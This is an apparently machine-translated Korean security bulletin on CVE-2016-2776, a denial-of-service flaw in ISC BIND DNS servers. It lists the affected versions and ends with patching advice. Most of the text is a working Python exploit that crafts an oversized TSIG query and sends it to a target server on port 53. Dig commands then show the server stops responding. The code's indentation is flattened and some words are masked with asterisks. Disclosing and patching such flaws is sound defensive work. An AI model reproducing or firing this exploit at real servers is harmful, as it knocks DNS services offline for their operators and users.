빈틈 방송_Bind-DOS 취약점.패킷 하나로 서버의 DNS 빈틈을 없앨 수 있습니까?
ISC BIND는 광범위하게 응용되는 도메인 이름 서버 소프트웨어입니다.일주일 전 인터넷협회(ISC)가 빈틈 CVE-2016-2776과 관련 패치를 발표했는데 이것은 BIND 서버에 영향을 주는 심각한 서비스 거부 빈틈이다.
취약점 개요:
버퍼 때문에.c 응답을 올바르게 구성하지 않아 원격 ***자가 구성된 조회를 통해 서비스 거부(단언 실패 및 프로그램 종료)를 초래할 수 있습니다.우리는 10월 4일에 이미 ***자가 *** 도구를 인터넷에 공개한 것을 발견했다.
버전 영향:
BIND 9.0.x -> 9.8.x
BIND 9.9.0->9.9.9-P2
BIND 9.9.3-S1->9.9.9-S3
BIND 9.10.0->9.10.4-P2
BIND 9.11.0a1->9.11.0rc1
테스트 코드:
import socket
import struct
TARGET = ('192.168.200.10', 53)
Q_A = 1
Q_TSIG = 250
DNS_MESSAGE_HEADERLEN = 12
def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512):
query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01"
sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1
tsig_rr = build_tsig_rr(sweet_spot)
return query_A + tsig_rr
def int16(n):
return struct.pack("!H", n)
def build_tsig_rr(bind_demarshalled_size):
signature_data = ("\x00\x00\x57\xeb\x80\x14\x01\x2c\x00\x10\xd2\x2b\x32\x13\xb0\x09"
"\x46\x34\x21\x39\x58\x62\xf3\xd5\x9c\x8b\x8f\x65\x00\x00\x00\x00")
tsig_rr_extra_fields = "\x00\xff\x00\x00\x00\x00"
necessary_bytes = len(signature_data) + len(tsig_rr_extra_fields)
necessary_bytes += 2 + 2 # length fields
# from sizeof(TSIG RR) bytes conforming the TSIG RR
# bind9 uses sizeof(TSIG RR) - 16 to build its own
sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)
tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields
tsig_data = algo_name + signature_data
return tsig_hdr + int16(len(tsig_data)) + tsig_data
def generate_padding(n):
max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]
buckets = [1] * len(max_per_bucket)
min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte
max_size = sum(max_per_bucket) + len(buckets) + 2
if not(min_size <= n <= max_size):
raise RuntimeException("unsupported amount of bytes")
curr_idx, n = 0, n - min_size
while n > 0:
next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)
buckets[curr_idx] = 1 + n - next_n
n, curr_idx = next_n, curr_idx + 1
n_padding = lambda amount: chr(amount) + "A" * amount
stringify = lambda sizes: "".join(map(n_padding, sizes)) + "\x00"
return stringify(buckets[:4]), stringify(buckets[4:])
if __name__ == "__main__":
bombita = build_bind_nuke()
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(bombita, TARGET)
s.close()
취약점 테스트:
하나.정상 조회 요청 dig@dns_server_ip yourdomain.com-t ns+short 정상 응답은 다음과 같습니다.yourdomain.com.ns1.yourdomain.com.2.*** 코드 python CVE-2016-2776 보내기.py dns_server_ip3.*** 효과 보내기 dig @dns_server_ip yourdomain.com -t ns +short는 다음과 같이 응답할 수 없습니다. <>>DiG 9.9.3 <<>> @dns_server_ip yourdomain.com -t ns +short; (1 server found);; global options: +cmd;; connection timed out; no servers could be reached
복구 시나리오:
주요 Linux 버전(예를 들어 빨간 모자, Centos, Ubuntu 등)은 현재 패치가 제공되어 있으며, 당신은 yumupdate(Redhat/Centos) 명령이나 apt-get update(Debian 클래스) 명령을 사용하여 패치를 하고 서버를 다시 시작하면 업데이트를 완성할 수 있습니다.